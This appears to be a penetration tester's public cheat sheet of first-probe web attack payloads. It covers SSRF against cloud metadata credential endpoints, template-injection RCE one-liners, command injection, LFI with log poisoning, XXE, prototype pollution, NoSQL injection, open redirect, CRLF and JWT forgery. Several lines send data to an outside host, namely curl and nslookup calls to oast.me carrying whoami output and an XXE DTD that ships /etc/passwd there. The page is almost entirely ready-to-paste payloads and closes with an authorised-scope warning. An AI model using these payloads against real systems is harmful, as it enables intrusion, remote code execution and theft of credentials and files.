These notes are public, opinionated, and evolving — read abdelkader.ma for the long-form posts.
PayloadsCommon Web Payloads

Common Web Payloads

These are the first payloads I drop into a target. Not exhaustive — just the highest-yield first probe for each class. Once one fires, I switch to a class-specific page.

SSRF

http://127.0.0.1/
http://localhost/
http://169.254.169.254/                 # AWS IMDS v1
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://metadata.google.internal/        # GCP
http://100.100.100.200/                 # Alibaba Cloud
http://[::1]/                           # IPv6 localhost
http://0.0.0.0/
http://[0:0:0:0:0:ffff:127.0.0.1]/      # IPv6-mapped v4
http://2130706433/                      # decimal 127.0.0.1
http://0177.0.0.1/                      # octal
http://0x7f.0.0.1/                      # hex

Filter bypasses:

http://evil.com#@127.0.0.1/
http://127.0.0.1.nip.io/
http://127.0.0.1.evil.com/
file:///etc/passwd
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
dict://127.0.0.1:11211/stats

Read more: Web Challenge Methodology

SSTI

{{7*7}}              {{7*'7'}}                     # Jinja
${7*7}               #{7*7}                        # JSP, ERB
<%= 7*7 %>           %{(#a=7*7).toString()}        # JSP, OGNL/Struts
{{= 7*7 }}                                          # Twig (varies)
*{7*7}                                              # Thymeleaf

After confirmation — Jinja RCE one-liner:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}

Twig RCE:

{{ _self.env.registerUndefinedFilterCallback("exec") }}{{ _self.env.getFilter("id") }}

ERB / Ruby:

<%= `id` %>
<%= system('id') %>

Command injection

;id
&&id
|id
`id`
$(id)
%0aid
||id
%0d%0aid
;{IFS}id
;${IFS}id

Blind versions when output isn’t visible:

;sleep 5
;curl http://oast.me/$(whoami)
;nslookup $(whoami).oast.me

LFI

/etc/passwd
../../../../../../etc/passwd
....//....//....//etc/passwd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
../../../../proc/self/environ           # leaks env vars including secrets
../../../../proc/self/cmdline
../../../../proc/self/cwd/<file>
php://filter/convert.base64-encode/resource=index.php
expect://id
data://text/plain,<?php phpinfo()?>

Log poisoning (LFI → RCE):

# In User-Agent: <?php system($_GET['c'])?>
GET /vuln.php?file=../../../../var/log/apache2/access.log&c=id

XXE

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

Out-of-band when response is blind:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % ext SYSTEM "http://oast.me/x.dtd">
  %ext;
]>
<foo>bar</foo>

x.dtd:

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://oast.me/?d=%data;'>">
%param;
%exfil;

Prototype pollution

?__proto__[admin]=true
?__proto__.admin=true
?constructor[prototype][admin]=true

Body:

{"__proto__":{"admin":true}}
{"constructor":{"prototype":{"admin":true}}}

Browser sinks to chain into XSS / DOM-clobbering: Object.prototype.innerHTML, Object.prototype.src, Object.prototype.template.

NoSQL injection (MongoDB)

{"username":{"$ne":null},"password":{"$ne":null}}
{"username":"admin","password":{"$gt":""}}
{"username":{"$regex":"^a"},"password":{"$ne":null}}
{"$where":"sleep(5000)"}

Open redirect

?next=https://evil.com/
?next=//evil.com/
?next=/\evil.com/
?next=https:evil.com
?next=https://target.com.evil.com/
?next=https://target.com@evil.com/
?next=javascript:alert(1)

CRLF

%0d%0aSet-Cookie:%20admin=true
%0d%0aLocation:%20//evil.com
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK

JWT footguns

# Try the algo "none"
{"alg":"none","typ":"JWT"}.{"sub":"admin"}.

# Weak HMAC secret
hashcat -m 16500 token.txt /usr/share/wordlists/rockyou.txt

# Algo confusion: RS256 → HS256, with HMAC key = the public key
⚠️

Paste any of these into authorised scope only. They are loud, logged, and if any of them succeed against a target you do not own, the legal problem is yours.

Related

OverviewOverview